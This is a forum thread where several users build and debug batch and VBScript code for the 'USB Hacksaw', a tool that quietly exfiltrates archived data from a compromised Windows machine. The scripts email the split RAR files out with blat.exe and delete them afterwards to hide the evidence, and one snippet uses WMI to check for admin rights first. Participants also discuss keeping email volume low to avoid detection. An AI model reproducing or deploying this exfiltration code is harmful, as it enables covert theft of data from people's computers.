Getting data off a an owned machine

[SomeoneE1se]

IF EXIST pwned.rar GOTO 5end1

IF EXIST pwned.r00 GOTO 5end1

ELSE GOTO END



:hak1

set /a part=%part%+1

IF %part% lss 10

goto less10

else goto more10



:less10

IF EXIST pwned.r0%part% goto sendless10

else goto end

:more10

IF EXIST pwned.r%part% goto send

else goto end



:5end1

blat.exe pwned.rar -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.rar (delete the evidence after sending)

goto hak1



:sendless10

blat.exe pwned.r0%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.r%part% (delete the evidence after sending)

goto hak1



:send

blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.r%part% (delete the evidence after sending)

goto hak1



:end

exit

@ this point gmullens las small bit would prolly b better as its les line's of code ....

(tho i dont kno the issue's ....)

I think this bit of code will create an error becasue if the .rar does not exist when it sees the .r00 it will try to send *.rar and it not being there will gen the error.... spliting the send of .rar and the sending of .r00 should fix this

I can't think right now I'm at work

[cooper]

Okay, keep in mind with this that I have no Windows machine to test this batch code against. There are most likely some errors in here, but you should get the general idea.

SET NAMEPART=pwned.

SET PARTNO=-1



:again

SET FILENAME=%NAMEPART%rar

IF EXISTS %FILENAME%

    GOTO transmit



SET /a PARTNO=%PARTNO%+1



IF %PARTNO% lss 10

    SET FILENAME=%NAMEPART%.r0%PARTNO%

ELSE

    SET FILENAME=%NAMEPART%.r%PARTNO%



IF EXISTS %FILENAME%

    GOTO transmit



IF %PARTNO% lss 10

    SET FILENAME=%NAMEPART%.00%PARTNO%

ELSE IF %PARTNO% lss 100

    SET FILENAME=%NAMEPART%.0%PARTNO%

ELSE

    SET FILENAME=%NAMEPART%.%PARTNO%



IF EXISTS %FILENAME%

    GOTO transmit



GOTO end



:transmit

blat.exe %FILENAME% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del %FILENAME%

GOTO again



:end

In short, us a variable throughout the script that you fill with the file to send. Test for the .rar, the .r01 and the .001 variants of filenames, and ups the number as things progress. Not sure if "ELSE IF" is allowed, but if it is it should nicely deal with rars that come in more than 100 pieces.

How's it look?

[pseudobreed]

That's why I wrote the vbscript to just grab files based on a filter. I did not know how the files were going to get split and as long as the argument has a wildcard, the filename should get put into the array. That, and I had no idea what happens if you split a file over 101 parts...

The only problem I see is if the files that you want to send out begin the same as other files. However, this is an easy fix. Just name the data files something unique and include as much as you can as the argument with a * at the end.

[boristsr]

is it just me or has that batch script been written 3 times now? :P

[SomeoneE1se]

it's been fixed 3 times... however if we start to send more then about 20 e-mails someone is going to catch that if not flagged as a spamer and that being a quick way to get an IP killed so keeping it to less then 100 would be the best idea...

when I get home i'll test coopers batch script and edit it if need be

[Darren Kitchen]

For Each FileName In arrFiles

  'WScript.Echo FileName

  blat.exe FileName -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

Next

on

Not quite working

S:>cscript send.vbs goodies*

Microsoft (R) Windows Script Host Version 5.6

Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.



S:send.vbs(19, 30) Microsoft VBScript compilation error: Syntax error

for me 19,30 is where it does the -to emailaddress

Seems that "to" is a vbs command its its parsing it wrong. what's the escape character for vbs?

[Darren Kitchen]

finished the hack. thanks for all the help guys!

[pseudobreed]

That was my fault. Trying to pull off batch commands in vbscript.

This works, and I actually tested it using blat instead of the echo command.

Set FSO = CreateObject("Scripting.FileSystemObject")



ReDim arrFiles(1)

Set Folder = FSO.GetFolder(".")

Set Files = Folder.Files



For Each File in Files

  If CheckFile(File.Name, WSCript.Arguments(0)) Then

    If i > UBound(arrFiles) Then Redim Preserve arrFiles(i*2)

    arrFiles(i) = File.Path

    i = i + 1

  End If

Next

ReDim Preserve arrFiles(i-1)



Set WSHShell = Wscript.CreateObject("Wscript.Shell")



For Each FileName In arrFiles

  Send = "blat.exe " & FileName & " -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099"

  'WScript.Echo Send

  WSHShell.Run Send

Next



Private Function CheckFile (ByVal Name, ByVal Filter)

  CheckFile = False

  FilterPos = 1

  NamePos = 1



  Do

    If FilterPos > Len(Filter) Then 

      CheckFile = NamePos > len(Name)

      Exit Function

    End If



    If Mid(Filter,FilterPos) = ".*" Then

      If NamePos > Len(Name) Then CheckFile = True

      Exit Function

    End If



    If Mid(Filter,FilterPos) = "." Then

      CheckFile = NamePos > Len(Name)

      Exit Function

    End If



    FilterCount = Mid(Filter,FilterPos,1)

    FilterPos = FilterPos + 1



    Select Case FilterCount

      Case "*"

        CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos)

        Exit Function

      Case "?"

        If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1

      Case Else

        If NamePos > Len(Name) Then Exit Function

        NameCount = Mid(Name,NamePos,1)

        NamePos = NamePos + 1

        If Strcomp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function

    End Select

  Loop

End Function



Private Function CheckFile2 (ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0)

  FilterPos = FilterPos0



  Do

    If FilterPos > Len(Filter) Then

      CheckFile2 = True

      Exit Function

    End If



    FilterCount2 = Mid(Filter,FilterPos,1)

    FilterPos = FilterPos + 1    

    

    If FilterCount2 <> "*" And FilterCount2 <> "?" Then

      Exit Do

    End If

  Loop



  If FilterCount2 = "." Then

    If Mid(Filter,FilterPos) = "*" Then

      CheckFile2 = True

      Exit Function

    End If

    

    If FilterPos > Len(Filter) Then

      CheckFile2 = InStr(NamePos0,Name,".") = 0

      Exit Function

    End If

  End If



  For NamePos = NamePos0 To Len(Name)

    NameCount = Mid(Name,NamePos,1)



    If StrComp(FilterCount2,NameCount,vbTextCompare)=0 Then

      If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then

        CheckFile2 = True

        Exit Function

      End If

    End If

  Next

  

  CheckFile2 = False

End Function

Just change the credentials for blat and everything should be ok.

[Darren Kitchen]

I'll try it this afternoon. I was able to get this hack, the USB Hacksaw, working on a guest account so thats pretty exciting stuff. Unfortunately the IFMEMBER command doesnt work so I've got a lot of redundancy in my script which could be cleaned up if I knew if the logged in user was guest or power user/admin.

then again maybe creating a directory in %systemroot% and checking the errorlevel would help determine that since guests cant do that.

ahh, POC code.... you know how it goes. just enough to make it work.

[pseudobreed]

The first thing that came to mind was to use the WMI. The following code will query the NetworkLoginProfile, check privileges of the current logged in user. If the privilege is equal to 2, then user account has admin rights and you can add the rest of the code there.

Copy and paste code into a .vbs file.

szComputer = "."

Set objShell = WScript.CreateObject("WScript.Shell")

Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!" & szComputer & "rootcimv2")

Set colItems = objWMIService.ExecQuery ("Select * from Win32_NetworkLoginProfile")

For Each objItem in colItems

  If objItem.Caption = objShell.ExpandEnvironmentStrings("%username%") Then

    If objItem.Privileges = 2 Then

      ' 0 - Guest

      ' 1 - User

      ' 2 - Administrator

      ' <INSERT REST OF CODE HERE>

    End If

  End If

Next

[DLSS]

boy , i never thought working on code could be this much fun :D

especially wit everybody working together :D *arg why isn't there a hugging emoticon ?*

[pseudobreed]

If the original was called the Switchblade, why is Darren calling the next version the USB Hacksaw?

A scarey thought.

[SomeoneE1se]

Think about it.. a switchblade can be hidden very well and that was the idea of it never let them know they got owned.. but now with the haksaw it's a bit more brutal....

think of it this way...

with a switchblade you have to stab them more then a few times to kill them...

but with a haksaw you can just cut there head off... thats a lot easyer way to kill someone ;)

[VaKo]

Going on practicalitys, I wouldn't bring a hacksaw to a knife fight...

[SomeoneE1se]

when is comes right down to it.. in any kinda fight I'd use martial arts.. the best martial arts for a knife fight Shotgon Do... but then thats no match for Run Foo and if you happen to be in the US theres always I Su Yoo

[PoyBoy]

Id bring a bereeta Xtrema 2 to a knife fight